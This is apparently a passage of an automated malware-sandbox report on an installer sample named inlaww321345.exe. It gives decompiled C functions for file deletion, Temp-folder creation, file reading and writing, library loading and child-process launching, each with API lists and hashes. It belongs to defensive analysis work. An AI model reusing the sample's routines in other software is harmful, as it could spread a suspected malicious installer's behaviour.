                    					_t9 = DeleteFileW();
                    				} else {
                    					_t9 = RemoveDirectoryW(); // executed
                    				}
                    				if(_t9 == 0) {
                    					if((_a8 & 0x00000004) == 0) {
                    						SetFileAttributesW(_t14, _t13);
                    					}
                    					goto L8;
                    				} else {
                    					return 1;
                    				}
                    			}







                    APIs
                      • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                      • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$Attributes$DeleteDirectoryRemove
                    • String ID:
                    • API String ID: 1655745494-0
                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                    • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 629 406ae6-406afe WaitForSingleObject 630 406b0e-406b10 629->630 631 406b00-406b0c call 406a77 WaitForSingleObject 630->631 632 406b12-406b25 GetExitCodeProcess 630->632 631->630
                    C-Code - Quality: 100%
                    			E00406AE6(void* __ecx, void* _a4) {
                    				long _v8;
                    				long _t6;
                    
                    				_t6 = WaitForSingleObject(_a4, 0x64);
                    				while(_t6 == 0x102) {
                    					E00406A77(0xf);
                    					_t6 = WaitForSingleObject(_a4, 0x64);
                    				}
                    				GetExitCodeProcess(_a4,  &_v8); // executed
                    				return _v8;
                    			}






                    APIs
                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                    • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CodeExitProcess
                    • String ID:
                    • API String ID: 2567322000-0
                    • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                    • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                    • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                    • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 635 4015c1-4015d5 call 402da6 call 405fe8 640 401631-401634 635->640 641 4015d7-4015ea call 405f6a 635->641 643 401663-4022f6 call 401423 640->643 644 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 640->644 649 401604-401607 call 405c1c 641->649 650 4015ec-4015ef 641->650 659 402c2a-402c39 643->659 660 40292e-402935 643->660 644->659 662 40165b-40165e 644->662 658 40160c-40160e 649->658 650->649 655 4015f1-4015f8 call 405c39 650->655 655->649 666 4015fa-4015fd call 405b9f 655->666 663 401610-401615 658->663 664 401627-40162f 658->664 660->659 662->659 667 401624 663->667 668 401617-401622 GetFileAttributesW 663->668 664->640 664->641 671 401602 666->671 667->664 668->664 668->667 671->658
                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
                    				void* _t17;
                    				int _t23;
                    				void* _t25;
                    				signed char _t26;
                    				short _t28;
                    				short _t31;
                    				short* _t34;
                    				void* _t36;
                    
                    				_t28 = __ebx;
                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                    				_t17 = E00405FE8(_t16);
                    				_t32 = _t17;
                    				if(_t17 != __ebx) {
                    					do {
                    						_t34 = E00405F6A(_t32, 0x5c);
                    						_t31 =  *_t34;
                    						 *_t34 = _t28;
                    						if(_t31 != _t28) {
                    							L5:
                    							_t25 = E00405C1C( *(_t36 + 8));
                    						} else {
                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
                    								goto L5;
                    							} else {
                    								_t25 = E00405B9F( *(_t36 + 8)); // executed
                    							}
                    						}
                    						if(_t25 != _t28) {
                    							if(_t25 != 0xb7) {
                    								L9:
                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    							} else {
                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                    								if((_t26 & 0x00000010) == 0) {
                    									goto L9;
                    								}
                    							}
                    						}
                    						 *_t34 = _t31;
                    						_t32 = _t34 + 2;
                    					} while (_t31 != _t28);
                    				}
                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E0040666E(0x7b4000,  *(_t36 + 8));
                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                    					if(_t23 == 0) {
                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    					}
                    				}
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
                    				return 0;
                    			}












                    APIs
                      • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 00405FF6
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                    • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                    • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                    • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                    • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E00406045(void* __eflags, intOrPtr _a4) {
                    				int _t11;
                    				signed char* _t12;
                    				long _t16;
                    				intOrPtr _t18;
                    				intOrPtr* _t21;
                    				signed int _t23;
                    
                    				E0040666E(0x7a4790, _a4);
                    				_t21 = E00405FE8(0x7a4790);
                    				if(_t21 != 0) {
                    					E004068F5(_t21);
                    					if(( *0x7a8ab8 & 0x00000080) == 0) {
                    						L5:
                    						_t23 = _t21 - 0x7a4790 >> 1;
                    						while(1) {
                    							_t11 = lstrlenW(0x7a4790);
                    							_push(0x7a4790);
                    							if(_t11 <= _t23) {
                    								break;
                    							}
                    							_t12 = E004069A4();
                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                    								E00405F89(0x7a4790);
                    								continue;
                    							} else {
                    								goto L1;
                    							}
                    						}
                    						E00405F3D();
                    						_t16 = GetFileAttributesW(??); // executed
                    						return 0 | _t16 != 0xffffffff;
                    					}
                    					_t18 =  *_t21;
                    					if(_t18 == 0 || _t18 == 0x5c) {
                    						goto L1;
                    					} else {
                    						goto L5;
                    					}
                    				}
                    				L1:
                    				return 0;
                    			}










                    APIs
                      • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                      • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 00405FF6
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                      • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                    • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560,00000000), ref: 0040609E
                    • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,7620FAA0,?,7620F560,00405D9A,?,7620FAA0,7620F560), ref: 004060AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                    • String ID:
                    • API String ID: 3248276644-0
                    • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                    • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
                    • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
                    • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				signed int _t16;
                    				signed int _t17;
                    				void* _t18;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t6 = _t17 * 0x1c +  *0x7a8ad0;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                    						 *0x7a7a8c =  *0x7a7a8c + _t12;
                    						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
                    					}
                    				}
                    				return 0;
                    			}












                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                    • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
                    • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
                    • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C51(WCHAR* _a4) {
                    				struct _PROCESS_INFORMATION _v20;
                    				int _t7;
                    
                    				0x7a4f90->cb = 0x44;
                    				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
                    				if(_t7 != 0) {
                    					CloseHandle(_v20.hThread);
                    					return _v20.hProcess;
                    				}
                    				return _t7;
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3712363035-0
                    • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                    • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
                    • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
                    • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406A3B(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				signed int _t10;
                    
                    				_t10 = _a4 << 3;
                    				_t8 =  *(_t10 + 0x40a410);
                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                    				}
                    				_t5 = E004069CB(_t8); // executed
                    				if(_t5 == 0) {
                    					return 0;
                    				}
                    				goto L2;
                    			}






                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                      • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                      • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                      • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                    • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0040615E(WCHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesW(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}






                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406139(WCHAR* _a4) {
                    				signed char _t3;
                    				signed char _t7;
                    
                    				_t3 = GetFileAttributesW(_a4); // executed
                    				_t7 = _t3;
                    				if(_t7 != 0xffffffff) {
                    					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                    				}
                    				return _t7;
                    			}






                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405C1C(WCHAR* _a4) {
                    				int _t2;
                    
                    				_t2 = CreateDirectoryW(_a4, 0); // executed
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				return 0;
                    			}





                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                    • GetLastError.KERNEL32 ref: 00405C30
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406210(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}






                    APIs
                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00790349,0078B730,0040357F,0078B730,00790349,0040CE68,00793730,00004000,?,00000000,004033A9), ref: 00406224
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004061E1(void* _a4, void* _a8, long _a12) {
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12;
                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                    				if(_t7 == 0 || _t11 != _a12) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}






                    APIs
                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004035FE(long _a4) {
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                    				return _t2;
                    			}





                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00401FA4() {
                    				void* _t9;
                    				intOrPtr _t13;
                    				void* _t15;
                    				void* _t17;
                    				void* _t20;
                    				void* _t22;
                    
                    				_t19 = E00402DA6(_t15);
                    				E004056D0(0xffffffeb, _t7);
                    				_t9 = E00405C51(_t19); // executed
                    				_t20 = _t9;
                    				if(_t20 == _t15) {
                    					 *((intOrPtr*)(_t22 - 4)) = 1;
                    				} else {
                    					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                    						_t13 = E00406AE6(_t17, _t20); // executed
                    						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                    							if(_t13 != _t15) {
                    								 *((intOrPtr*)(_t22 - 4)) = 1;
                    							}
                    						} else {
                    							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
                    						}
                    					}
                    					_push(_t20);
                    					CloseHandle();
                    				}
                    				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
                    				return 0;
                    			}










                    APIs
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                      • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                      • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                      • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                      • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                      • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                    • String ID:
                    • API String ID: 2972824698-0
                    • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                    • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
                    • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
                    • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t94;
                    				long _t95;
                    				int _t100;
                    				void* _t108;
                    				intOrPtr _t130;
                    				struct HWND__* _t134;
                    				int _t156;
                    				int _t159;
                    				struct HMENU__* _t164;
                    				struct HWND__* _t168;
                    				struct HWND__* _t169;
                    				int _t171;
                    				void* _t172;
                    				short* _t173;
                    				short* _t175;
                    				int _t177;
                    
